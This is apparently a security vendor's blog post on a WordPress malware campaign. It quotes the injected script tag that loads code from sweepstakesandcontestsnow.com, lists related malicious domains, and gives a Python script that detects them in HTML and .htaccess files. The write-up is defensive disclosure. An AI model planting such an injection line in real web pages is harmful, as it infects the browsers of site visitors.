Research Blog

New Malware – sweepstakesandcontestsnow.com

We are seeing many WordPress sites on shared hosts (GoDaddy, Bluehost, Dreamhost and a few others) compromised with malware from sweepstakesandcontestsnow.com.

This is what gets added to the hacked site:

 

<script src="http://sweepstakesandcontestsnow.com/nl.php?nnn=1">..

And that code is used to infect the browser of the person visiting the compromised web site.

 
What is interesting is that this attack is being done by the same group that infected thousands of GoDaddy sites with the sokoloperkovuskeci.com .htaccess redirection (all hosted at 91.220.0.30):

 

sokoloperkovuskeci.com
sweepstakesandcontestsnow.com
sweepstakesandcontestsinfo.com
sweepstakesandcontestsdo.com
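
A detection check for the indicators above, added here as an example and not Sucuri's own tooling: it flags `<script>` tags whose `src` host is one of the four domains listed in this post (or a subdomain of one), and URLs in `.htaccess` content that point at them. The sample HTML and `.htaccess` text, the `cdn.` subdomain and the lookalike domain are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Domains listed in this post.
BAD_DOMAINS = {
    "sokoloperkovuskeci.com",
    "sweepstakesandcontestsnow.com",
    "sweepstakesandcontestsinfo.com",
    "sweepstakesandcontestsdo.com",
}
# src of any <script> tag: quoted or unquoted, any case, may span lines.
SCRIPT_SRC = re.compile(
    r"""<script\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.I)
# Any absolute URL; used for .htaccess, where the redirect target is a URL.
ANY_URL = re.compile(r"""(https?://[^\s"'<>]+)""", re.I)

def is_bad_host(url):
    """True if the URL's host is a listed domain or a subdomain of one."""
    if url.startswith("//"):  # protocol-relative src
        url = "http:" + url
    try:
        host = (urlparse(url).hostname or "").lower().rstrip(".")
    except ValueError:  # malformed URL, e.g. a broken IPv6 literal
        return False
    return any(host == d or host.endswith("." + d) for d in BAD_DOMAINS)

def scan_text(text, htaccess=False):
    """Return (line_number, url) pairs, in file order, that hit a listed domain."""
    pattern = ANY_URL if htaccess else SCRIPT_SRC
    hits = []
    for m in pattern.finditer(text):
        url = next(g for g in m.groups() if g is not None)
        if is_bad_host(url):
            hits.append((text.count("\n", 0, m.start()) + 1, url))
    return hits

# Constructed samples (not captured from a real site).
SAMPLE_HTML = """<html><body>
<script src="/wp-includes/js/jquery/jquery.js"></script>
<script src="http://sweepstakesandcontestsnow.com/nl.php?nnn=1"></script>
<SCRIPT type='text/javascript'
  SRC='//cdn.sweepstakesandcontestsdo.com/x.js'></SCRIPT>
<script src="http://notsweepstakesandcontestsnow.com/a.js"></script>
</body></html>"""
SAMPLE_HTACCESS = "RewriteEngine On\nRewriteRule .* http://sokoloperkovuskeci.com/ [R,L]\n"

if __name__ == "__main__":
    print(scan_text(SAMPLE_HTML))
    print(scan_text(SAMPLE_HTACCESS, htaccess=True))
```

Matching is on the parsed hostname rather than a substring, so the lookalike domain in the sample is not reported while the subdomain is.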

Whois of the group behind it:

Registrant Contact:
NA
Gavai Otarro admin@sweepstakesandcontestsnow.com
+1.445669776 fax: +1.445669776
5653 6th Street
Pittsburgh PA 54353
us

If your site is compromised, sign up with us and we will fix it for you: http://sucuri.net/signup

 
